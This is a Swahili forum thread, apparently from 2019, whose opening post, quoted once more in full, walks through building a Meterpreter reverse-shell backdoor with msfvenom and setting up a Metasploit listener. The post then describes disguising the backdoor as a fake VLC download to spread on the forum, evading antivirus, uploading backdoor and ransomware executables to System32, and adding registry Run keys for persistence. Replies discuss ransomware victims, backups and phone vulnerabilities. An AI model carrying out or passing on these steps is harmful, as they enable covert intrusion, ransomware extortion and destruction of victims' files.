[Blackhats-2019] jinsi gani hackers wanavyohack pc yako na ku upload files + RANSOMWARES kwenye PC yako(PROCESSOR HACKING)

[Blackhats-2019] jinsi gani hackers wanavyohack pc yako na ku upload files + RANSOMWARES kwenye PC yako(PROCESSOR HACKING)

Thefreedom

JF-Expert Member
Joined
Jan 27, 2019
Posts
319
Reaction score
316
Hey friend !!!! Thefreedom is hereeee.............

kama kawaida yangu ni kuwasaidia watu na kutoa angalizo kwa wale ndugu zangu ambao hawana uelewa na hacking + tech.

leo nitaongelea kitu kimoja ambacho naona kabisa watu hawa carei kabisa ...........

Leo lets discuss inakuaje mpaka data zako zinakuwa comprimissed na ransomewares au dangerous viruses wowote ambao watakuletea shida wewe ndugu msomajiii.

Na ni Kwa jinsi gani hackers wanaweza kupenya kwenye system yako au PC yako na kuweka makazi ya kudumu.........

before we start embu vuta picha kwenye situation hizi...

1) mfano unatumia PC ya ofisi ambayo ina report zako za mwezi ujao ambao unatarijia kusubmit >>>je ikiwa locked na strongest ransomwares utafanyajeeee...na hauna backup yyte je utakuwa kwenye hali gani??

2. wewe mwanafunzi au mfanyabiashara au mtumiaji wa kawaida ambaye unathamini data zako >>>itakuwaje siku ukilockiwa stuffs zako na hackers na wakidemand kiasi cha pesa ili files zako ziwe unlocked na ukiangalia maisha ya sasa hasa upande wa pesa na utafuatajii >>>>utafanyaje??


basi nikaona sio vema niwaoneshe na kuwafunza hii mambo kama mlio nitafuta PM na kunidonate niwe wazi kwenye haya maswala.......na ndivyo mimi nitakavyochukua jukumu hili kuonesha a real life of hacking < am hacking everything with purposes sio kwa kujifurahisha >

lets start................................................................

hacking-blackhat-movie.1280x600.jpg


kwa wale ndugu zangu ambao hamjui maaaana ya RANSOMWARE???

Ransomware huyu ni malicious software ambaye kadizainiwa ku lock computer systems mpaka pale users au victim akilipa kiasi cha pesa ambacho mtengnezaji wa virus huyu amekiweka >>kwa lengo la kupata data zake ...
so unalipa kisha nakupa a key ya ku unlock data zako pale zikiwa locked >>>>easy


wale wa history tunasema this is like a barter trade (system) you give something ......yo gt service......

hivo basi leo nitawaonesha njia AMBAYOo ni famous sana ....inayotumika hata humu JAMII FORUMS NA BAADHI YA WATU........

requirements

1 Windows pc
2. linux installed kwenye pc yako
3. port forwading server >>> kama hauna router use this below
>>>>>ssh server link SSHReach.me
>>>>>portmap link Portmap.io - free port forwarding solution
>>>>> ipjetable.net
>>>>> DigitalOcean - Cloud Computing, Simplicity at Scale
4. my powerful binders download BINDER.zip - Shared with pCloud

5. kama victim ana antivirus unaweza encrypt backdoor na zirikatu (kwa wale upcoming blackhats ) au unaweza nifuatilia hapa mRanonyMousTZ - Overview soon nita upload framework coded by me.au unaweza add SSL certficate ukabind na backdoor use my code to generate SSL trusted cerificate below

root@kali:~#openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.random.com" -keyout random.key.pem -out random.crt


root@kali:~#cat random.key.pem random.crt > random.pem


After that you can erase the random.cert and random.key.cert.

root@kali:~#rm -f random.key.pem random.crt


baada ya hapo utatumia veil ku add custome SSL

HATUA ZINAZOFANYIKA

1. kutengeneza backdoor >>>>ila me ntatumia mfano wa kua attack targeted victim mfano nataka kumuattack ndugu yangu kali linux ........

fungua linux make a backdoor

msfvenom -p windows/meterpreter/reverse_tcp LHOST="weka server ip au host name na hakikisha iko forwaded port" LPORT="weka port" -a x86 -f exe > /root/Desktop/backdoor.exe

hapo msfvenom itatengeneza backdoor na utaikuta kwenye desktop as backdoor.exe

sasa kwann nimetuma symbol kama -a na -f ?

-a means architecture na nimeweka 32 bit kwasababu hatakama victim akiwa 64 bit inaweza fanya kazi kuliko kutumia 64 bit alafu victim ana 32 bit >> hakika haitarun

-f means format>>>> target wetu ni windows PC (file.exe)

NOTE >> Kwa wale upcoming blackhats unaweza tumia zirikatu lakini hakikisha system yako umeinstall mono
Cross platform, open source .NET framework lasivyo hutoweza encrypt ur backdoor kwa most of antiviruses

how to installl it ?

kwa wale wa ubuntu use 18.04 (i386, amd64, armhf, arm64, ppc64el)

run>>>>>>sudo apt install gnupg ca-certificates
run >>>>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>>>>>>>run echo "deb Index of /repo/ubuntu stable-bionic main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>>>>>>>sudo apt update

UBUNTU 16.04 (i386, amd64, armhf, arm64, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>>echo "deb Index of /repo/ubuntu stable-xenial main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update

UBUNTU 14.04 (i386, amd64, armhf, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>> echo "deb Index of /repo/ubuntu stable-trusty main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update

WALE WA KALI LINUX EASY paste hii

sudo apt install mono-devel

2. hatua ya pili baada ya kuandaaa backdoor ni kwenda kubind na software yoyote ili nije kushare JAMII FORUMS

katika hatua hii ya kubind naomba udownload video ambayo nimeonesha all this shit inavyokuwa kwa kila hatua mwisho wa hii thread

hivo nitabind

3. baada ya kubind nachokifanya now ni kuanzisha listerner ambayo itakuwa inanipa feedback zote victim akirun our software ambayo baada ya kubind niiitaita VLC LATEST VERSION 2019

kumbuka hii backdoor kama umefuata hatua zote za ku encrpty haitokuwa detected hata victim akiscan na antivirus yoyote kwasababu ya signature na size..... ziko trusted

so katika terminal ya kali linux use this guide

start msfconsole just type "msfconsole" then

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost "weka serbver ambayo uliweka kwenye creation ya backdoor yako"

set lport "weka port"

set ExitOnSession false

kisha exploit -j

4. nitapost au kumtumia victim wangu ile VLC SOFTWARE na soon akinstall nitapata connection na pc yake na atakuwa hacked

HOW TO HACK PROCESSOR AND CREATE PERSISTENCE IN WINDOWS [ BLACKHAT ADVANCED]

persistence ni kitendo cha ku gain access yani tunataka kuwa na makazi ya kudumu kwenye pc ya huyu victim wetu for a lifetime .....sasa hapa lengo letu kubwa ni kwamba endapo victim akizima pc tunataka hata kama connection ikiwa closed lengo letu baadaye akiwasha pc awashe server yetu yeye mwenyewe na kurudisha connection >>>>THIS IS WHAT WE CALL PROCESSOR HACKING LETS SEEE

kuwa makini sana na ingekuwa vizuri utafute mda udownload my video below ili uone kwa macho yako....

soon endapo victim akinstall our backdoor iliyo nyuma ya VLC itakupa access ya kufanya chochote kwenye PC yake

sasa kitu muhimu na cha msingi ni kucheck permissions + UAC

type hii command kwenye meterpreter session yako >>> getprivs utaona permissions ulizo nazo as admin

pia ukitype getsystem >>>> utaona jina ulilopewa as administartor kwenye vixtim pc

ukitype hizo command usipo pata errors ur GOOD

na kama umetype umepate error basi nitawaletea uzi wa how to bypass UAC in advanced

sasa hatua inayofuata ni ku upload backdoor ileile + RANSOMWARE kwenye target machine

use this codes

upload /root/Desktop/backdoor.exe c:\\Users\\Public
upload /root/Desktop/ransomware.exe c:\\Users\\Public


hii /root/Desktop/backdoor.exe hii ni sehemu ambayo nimeweka exe software ambayo nitaipatch na processor ya huyu victim
na hii c:\\Users\\Public ni location ambayo itaenda kutua baada ya ku upload kwenye victim pc na tuna tumia \\ kwa sababu metasploit haitambui single back slash kwenye victim pc kwaiyo ukitaka oneshea location ya directory kwa victim we are using double back slash \\ ila tukiwa katika shell like CMD WE USE SINGLE \

now HIZO FILES zitakuwa uplaoded kwa victim remotely

hatua inayofuata kwakuwa tuna permission pia tuna upload kwenye system 32 bit mana tunataka victim akiwasha pc tupate a real permision kama yeye anavyokuwa kwenye pc yake so tutauplaod hizo backdoor + ransomware kwenye system32 pia use hii command

upload /root/Desktop/backdoor.exe c:\\Windows\\System32
upload /root/Desktop/ransomware.exe c:\\Windows\\System32


NOW we attacking processor

use this command

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d C:\\Windows\\System32\\backdoor.exe
kishA press enter itakumbia SUCCEFFUL SET

kwa ransomware use same sema hakikisha majina ya hizo backdoor yafaanane na zile ulizo upload kwa target

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v ransomware -d C:\\Windows\\System32\\ransomware.exe

baaada ya hapo matokeo yake ni nini victim huyu akija kurestart pc atawasha connection na server + system yake itarun huyu virus atomatic as administrator

files zitakuwa locked na utakuwa na access naye.


okay guys unaweza jiuliza je hizi files tunazopeana JF inakuaje >?? me sina jibu ila kuwen makini

kwa wale ambao wangependa kuona hiii mambo inakuwaje kwa video download my presentation uone kila hatua hapa WINDOWS PERSISTENCE & PROCESSOR HACKING, UPLOAD RANSOMEWARES presentation BY THEFREEDOM BLACKHATS

Thefreedom


















 
Oky mkuu. Hii imenikumbusha miaka kama mi2 hv nyuma ilipotokea ile worldwide ransomware attack ambapo kuna majamaa walitumia vulnerability fln ilokuwepo kwenye windowsXP na wakalock computer nyng kinoma na walikua wanadirect watu wawalipe some bitcoins kwenye wallet yao ili pc zao ziwe unlocked. Sikumbuki vzr mwaka lkn ni kama 2017 hv. Hospitals, companies na NGO's mbalimbali ziliathirika na hii attack nchi mbalimbali na kwa Africa attack ilifika hadi kenya.

Itz good watu waisome angalau waielewe kdg (au full kwa watakao weza) coz ukishaelewa attack yyt ikoje basi ni virahisi kujikinga nayo. Na hii ni kati ga attacks zinazotumiwa sana kutarget companies hasa hasa zinazodeal na researches, NGO's na hospitals.

Sema Thefreedom inabidi uwe unaweka vipande vdgvdg coz kwa beginner ni vigumu kusoma hii article ikiwa hv full(Japo kama ingekua ni udaku angeweza)



"Hacking has never been simple, If it becomes simple thn it is not hacking"


*****Thumbs Up*****
 
Oky mkuu. Hii imenikumbusha miaka kama mi2 hv nyuma ilipotokea ile worldwide ransomware attack ambapo kuna majamaa walitumia vulnerability fln ilokuwepo kwenye windowsXP na wakalock computer nyng kinoma na walikua wanadirect watu wawalipe some bitcoins kwenye wallet yao ili pc zao ziwe unlocked. Sikumbuki vzr mwaka lkn ni kama 2017 hv. Hospitals, companies na NGO's mbalimbali ziliathirika na hii attack nchi mbalimbali na kwa Africa attack ilifika hadi kenya.

Itz good watu waisome angalau waielewe kdg (au full kwa watakao weza) coz ukishaelewa attack yyt ikoje basi ni virahisi kujikinga nayo. Na hii ni kati ga attacks zinazotumiwa sana kutarget companies hasa hasa zinazodeal na researches, NGO's na hospitals.

Sema Thefreedom inabidi uwe unaweka vipande vdgvdg coz kwa beginner ni vigumu kusoma hii article ikiwa hv full(Japo kama ingekua ni udaku angeweza)



"Hacking has never been simple, If it becomes simple thn it is not hacking"


*****Thumbs Up*****
Haina noma man nimekusoma vzr sana
 
Hey friend !!!! Thefreedom is hereeee.............

kama kawaida yangu ni kuwasaidia watu na kutoa angalizo kwa wale ndugu zangu ambao hawana uelewa na hacking + tech.

leo nitaongelea kitu kimoja ambacho naona kabisa watu hawa carei kabisa ...........

Leo lets discuss inakuaje mpaka data zako zinakuwa comprimissed na ransomewares au dangerous viruses wowote ambao watakuletea shida wewe ndugu msomajiii.

Na ni Kwa jinsi gani hackers wanaweza kupenya kwenye system yako au PC yako na kuweka makazi ya kudumu.........

before we start embu vuta picha kwenye situation hizi...

1) mfano unatumia PC ya ofisi ambayo ina report zako za mwezi ujao ambao unatarijia kusubmit >>>je ikiwa locked na strongest ransomwares utafanyajeeee...na hauna backup yyte je utakuwa kwenye hali gani??

2. wewe mwanafunzi au mfanyabiashara au mtumiaji wa kawaida ambaye unathamini data zako >>>itakuwaje siku ukilockiwa stuffs zako na hackers na wakidemand kiasi cha pesa ili files zako ziwe unlocked na ukiangalia maisha ya sasa hasa upande wa pesa na utafuatajii >>>>utafanyaje??

basi nikaona sio vema niwaoneshe na kuwafunza hii mambo kama mlio nitafuta PM na kunidonate niwe wazi kwenye haya maswala.......na ndivyo mimi nitakavyochukua jukumu hili kuonesha a real life of hacking < am hacking everything with purposes sio kwa kujifurahisha >

lets start................................................................

View attachment 1050550

kwa wale ndugu zangu ambao hamjui maaaana ya RANSOMWARE???

Ransomware huyu ni malicious software ambaye kadizainiwa ku lock computer systems mpaka pale users au victim akilipa kiasi cha pesa ambacho mtengnezaji wa virus huyu amekiweka >>kwa lengo la kupata data zake ...
so unalipa kisha nakupa a key ya ku unlock data zako pale zikiwa locked >>>>easy


wale wa history tunasema this is like a barter trade (system) you give something ......yo gt service......

hivo basi leo nitawaonesha njia AMBAYOo ni famous sana ....inayotumika hata humu JAMII FORUMS NA BAADHI YA WATU........

requirements

1 Windows pc
2. linux installed kwenye pc yako
3. port forwading server >>> kama hauna router use this below
>>>>>ssh server link SSHReach.me
>>>>>portmap link Portmap.io - free port forwarding solution
>>>>> ipjetable.net
>>>>> DigitalOcean - Cloud Computing, Simplicity at Scale
4. my powerful binders download BINDER.zip - Shared with pCloud

5. kama victim ana antivirus unaweza encrypt backdoor na zirikatu (kwa wale upcoming blackhats ) au unaweza nifuatilia hapa mRanonyMousTZ - Overview soon nita upload framework coded by me.au unaweza add SSL certficate ukabind na backdoor use my code to generate SSL trusted cerificate below

root@kali:~#openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.random.com" -keyout random.key.pem -out random.crt


root@kali:~#cat random.key.pem random.crt > random.pem


After that you can erase the random.cert and random.key.cert.

root@kali:~#rm -f random.key.pem random.crt

baada ya hapo utatumia veil ku add custome SSL

HATUA ZINAZOFANYIKA

1. kutengeneza backdoor >>>>ila me ntatumia mfano wa kua attack targeted victim mfano nataka kumuattack ndugu yangu kali linux ........

fungua linux make a backdoor

msfvenom -p windows/meterpreter/reverse_tcp LHOST="weka server ip au host name na hakikisha iko forwaded port" LPORT="weka port" -a x86 -f exe > /root/Desktop/backdoor.exe

hapo msfvenom itatengeneza backdoor na utaikuta kwenye desktop as backdoor.exe

sasa kwann nimetuma symbol kama -a na -f ?

-a means architecture na nimeweka 32 bit kwasababu hatakama victim akiwa 64 bit inaweza fanya kazi kuliko kutumia 64 bit alafu victim ana 32 bit >> hakika haitarun

-f means format>>>> target wetu ni windows PC (file.exe)

NOTE >> Kwa wale upcoming blackhats unaweza tumia zirikatu lakini hakikisha system yako umeinstall mono
Cross platform, open source .NET framework lasivyo hutoweza encrypt ur backdoor kwa most of antiviruses

how to installl it ?

kwa wale wa ubuntu use 18.04 (i386, amd64, armhf, arm64, ppc64el)

run>>>>>>sudo apt install gnupg ca-certificates
run >>>>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>>>>>>>run echo "deb Index of /repo/ubuntu stable-bionic main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>>>>>>>sudo apt update

UBUNTU 16.04 (i386, amd64, armhf, arm64, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>>echo "deb Index of /repo/ubuntu stable-xenial main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update

UBUNTU 14.04 (i386, amd64, armhf, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>> echo "deb Index of /repo/ubuntu stable-trusty main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update

WALE WA KALI LINUX EASY paste hii

sudo apt install mono-devel

2. hatua ya pili baada ya kuandaaa backdoor ni kwenda kubind na software yoyote ili nije kushare JAMII FORUMS

katika hatua hii ya kubind naomba udownload video ambayo nimeonesha all this shit inavyokuwa kwa kila hatua mwisho wa hii thread

hivo nitabind

3. baada ya kubind nachokifanya now ni kuanzisha listerner ambayo itakuwa inanipa feedback zote victim akirun our software ambayo baada ya kubind niiitaita VLC LATEST VERSION 2019

kumbuka hii backdoor kama umefuata hatua zote za ku encrpty haitokuwa detected hata victim akiscan na antivirus yoyote kwasababu ya signature na size..... ziko trusted

so katika terminal ya kali linux use this guide

start msfconsole just type "msfconsole" then

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost "weka serbver ambayo uliweka kwenye creation ya backdoor yako"

set lport "weka port"

set ExitOnSession false

kisha exploit -j

4. nitapost au kumtumia victim wangu ile VLC SOFTWARE na soon akinstall nitapata connection na pc yake na atakuwa hacked

HOW TO HACK PROCESSOR AND CREATE PERSISTENCE IN WINDOWS [ BLACKHAT ADVANCED]

persistence ni kitendo cha ku gain access yani tunataka kuwa na makazi ya kudumu kwenye pc ya huyu victim wetu for a lifetime .....sasa hapa lengo letu kubwa ni kwamba endapo victim akizima pc tunataka hata kama connection ikiwa closed lengo letu baadaye akiwasha pc awashe server yetu yeye mwenyewe na kurudisha connection >>>>THIS IS WHAT WE CALL PROCESSOR HACKING LETS SEEE

kuwa makini sana na ingekuwa vizuri utafute mda udownload my video below ili uone kwa macho yako....

soon endapo victim akinstall our backdoor iliyo nyuma ya VLC itakupa access ya kufanya chochote kwenye PC yake

sasa kitu muhimu na cha msingi ni kucheck permissions + UAC

type hii command kwenye meterpreter session yako >>> getprivs utaona permissions ulizo nazo as admin

pia ukitype getsystem >>>> utaona jina ulilopewa as administartor kwenye vixtim pc

ukitype hizo command usipo pata errors ur GOOD

na kama umetype umepate error basi nitawaletea uzi wa how to bypass UAC in advanced

sasa hatua inayofuata ni ku upload backdoor ileile + RANSOMWARE kwenye target machine

use this codes

upload /root/Desktop/backdoor.exe c:\\Users\\Public
upload /root/Desktop/ransomware.exe c:\\Users\\Public


hii /root/Desktop/backdoor.exe hii ni sehemu ambayo nimeweka exe software ambayo nitaipatch na processor ya huyu victim
na hii c:\\Users\\Public ni location ambayo itaenda kutua baada ya ku upload kwenye victim pc na tuna tumia \\ kwa sababu metasploit haitambui single back slash kwenye victim pc kwaiyo ukitaka oneshea location ya directory kwa victim we are using double back slash \\ ila tukiwa katika shell like CMD WE USE SINGLE \

now HIZO FILES zitakuwa uplaoded kwa victim remotely

hatua inayofuata kwakuwa tuna permission pia tuna upload kwenye system 32 bit mana tunataka victim akiwasha pc tupate a real permision kama yeye anavyokuwa kwenye pc yake so tutauplaod hizo backdoor + ransomware kwenye system32 pia use hii command

upload /root/Desktop/backdoor.exe c:\\Windows\\System32
upload /root/Desktop/ransomware.exe c:\\Windows\\System32


NOW we attacking processor

use this command

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d C:\\Windows\\System32\\backdoor.exe
kishA press enter itakumbia SUCCEFFUL SET

kwa ransomware use same sema hakikisha majina ya hizo backdoor yafaanane na zile ulizo upload kwa target

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v ransomware -d C:\\Windows\\System32\\ransomware.exe

baaada ya hapo matokeo yake ni nini victim huyu akija kurestart pc atawasha connection na server + system yake itarun huyu virus atomatic as administrator

files zitakuwa locked na utakuwa na access naye.


okay guys unaweza jiuliza je hizi files tunazopeana JF inakuaje >?? me sina jibu ila kuwen makini

kwa wale ambao wangependa kuona hiii mambo inakuwaje kwa video download my presentation uone kila hatua hapa WINDOWS PERSISTENCE & PROCESSOR HACKING, UPLOAD RANSOMEWARES presentation BY THEFREEDOM BLACKHATS

Thefreedom
Safi sana mkuu ila naomba nikuulize (samahani kama nitakuwa nimekutoa nje ya Mada, swali langu ni je kati ya Android na IOS ipi ni rahisi kuwa attacked na hackers?)
 
Safi sana mkuu ila naomba nikuulize (samahani kama nitakuwa nimekutoa nje ya Mada, swali langu ni je kati ya Android na IOS ipi ni rahisi kuwa attacked na hackers?)
Okay ngja nikujibu hiviiii....

Ios kuhack ni simple ila sasa lazima uangalie na conditions mfano watu wa ios mnaaambiwa msijaribu ku jailbrak simu zenuuu ukiroot ios utakuwa rahisi kuhackiwa ila kwa wale ambao hawajajailbrak juzi kati kulikuwa na vurnerlability kwenye safari web browser kupitia BEEF + msf framework hiii imefanyika na kufanikiwa kwa 69% ku exploit hizi simu

Ila kwa androids

Uwe umeroot au ujaroot wewe tyr ni vurnerable

JIBU= ANDROIDS NDIO RAHISI KWA 99% kuhackiwa kutokana na udhaifu ulioshindwa kufixika mwanzo

Watu wengine naona wana tumia SECURE SMS yani hakuna security pale utapoteza pesa kuwalipa secure sms lakn still ur vurnerable
 
Yule ambaye aliyeniuliza swali kuhus androids.... Hiii app wanatumia sana watanzania wengi.... Ila siwanyimi soko hawa watu ila ukweliii hiii app ina encrypt sms lakn kuna kitu wamebugiii ambacho still tutabaki kupata na kuona kila unachofanya hata kama una hiii app
Screenshot_20190322-085826.jpeg
 
Majuzi kuna mshkaji Wangu analalamika mafail yake hayafunguki, nimeenda kucheki kila folder nikifungua kuna txt file lina instructions za kulipa dola 800 ili kufunguliwa mafail na ubaya huyo ransomware alikuwa ni mpya nili google mpaka nikakata tamaa.....ikabidi jamaa aipige window upya kabisa mafail yote yakafutika.

Kwa ushauri tu nunueni external disks muwe mnahamisha mafail yote ya kwenye PC kila baada ya wiki, Kitu chochote kinaweza ukipata PC yako
 
Majuzi kuna mshkaji Wangu analalamika mafail yake hayafunguki, nimeenda kucheki kila folder nikifungua kuna txt file lina instructions za kulipa dola 800 ili kufunguliwa mafail na ubaya huyo ransomware alikuwa ni mpya nili google mpaka nikakata tamaa.....ikabidi jamaa aipige window upya kabisa mafail yote yakafutika.

Kwa ushauri tu nunueni external disks muwe mnahamisha mafail yote ya kwenye PC kila baada ya wiki, Kitu chochote kinaweza ukipata PC yako
Huyooo ni open source ransomware u can download source codes github anaitwa hidden tear
 
Majuzi kuna mshkaji Wangu analalamika mafail yake hayafunguki, nimeenda kucheki kila folder nikifungua kuna txt file lina instructions za kulipa dola 800 ili kufunguliwa mafail na ubaya huyo ransomware alikuwa ni mpya nili google mpaka nikakata tamaa.....ikabidi jamaa aipige window upya kabisa mafail yote yakafutika.

Kwa ushauri tu nunueni external disks muwe mnahamisha mafail yote ya kwenye PC kila baada ya wiki, Kitu chochote kinaweza ukipata PC yako
Yap ndo maana narecommend watu wachk hii post coz attack za hivi unaweza kuzipata mda wwt, na ni kati ya attacks ambazo zinaudhi sana, Just Imagine you pay to get your own stuffs from your own computer...... very crazy indeed
 
Yap ndo maana narecommend watu wachk hii post coz attack za hivi unaweza kuzipata mda wwt, na ni kati ya attacks ambazo zinaudhi sana, Just Imagine you pay to get your own stuffs from your own computer...... very crazy indeed
Sure
 
Okay ngja nikujibu hiviiii....

Ios kuhack ni simple ila sasa lazima uangalie na conditions mfano watu wa ios mnaaambiwa msijaribu ku jailbrak simu zenuuu ukiroot ios utakuwa rahisi kuhackiwa ila kwa wale ambao hawajajailbrak juzi kati kulikuwa na vurnerlability kwenye safari web browser kupitia BEEF + msf framework hiii imefanyika na kufanikiwa kwa 69% ku exploit hizi simu

Ila kwa androids

Uwe umeroot au ujaroot wewe tyr ni vurnerable

JIBU= ANDROIDS NDIO RAHISI KWA 99% kuhackiwa kutokana na udhaifu ulioshindwa kufixika mwanzo

Watu wengine naona wana tumia SECURE SMS yani hakuna security pale utapoteza pesa kuwalipa secure sms lakn still ur vurnerable
Ok basi sitagusa android aisee
 
Asee kuna ransom anaitwa BLOWER, any solution to decrypt the files wakuu??
 
Asee kuna ransom anaitwa BLOWER, any solution to decrypt the files wakuu??
Ransomware sio kila mdudu unaweza mtoa na online decrypter cha msingi hapo ni kuchek kama huyo mdudu kama ametengeneza connection yyte kwenye pc yako kama huyo ransomware hajafungua port yyte naweza naweza nikacode decrypter ila kama ame establish connection inayoweza kuupload key amabzo Sinatra's kana na pc yako na types za file itakuwa ngumu kwasababu atakuwa anagenerate keys kwenye server so kuchek

Andika kwenye cmd yako ili uchek kama kuna connection established yyte andika

netstat -ano kicha chek
 
Ransomware sio kila mdudu unaweza mtoa na online decrypter cha msingi hapo ni kuchek kama huyo mdudu kama ametengeneza connection yyte kwenye pc yako kama huyo ransomware hajafungua port yyte naweza naweza nikacode decrypter ila kama ame establish connection inayoweza kuupload key amabzo Sinatra's kana na pc yako na types za file itakuwa ngumu kwasababu atakuwa anagenerate keys kwenye server so kuchek

Andika kwenye cmd yako ili uchek kama kuna connection established yyte andika

netstat -ano kicha chek
Shukrani mzee, nitachek nitakujulisha, ni PC ya jamaa yangu, aliamua ku format PC, tatizo ni aliingia had kwenye external HDD, do kabakiwa na external hajaiformat
 
Back
Top Bottom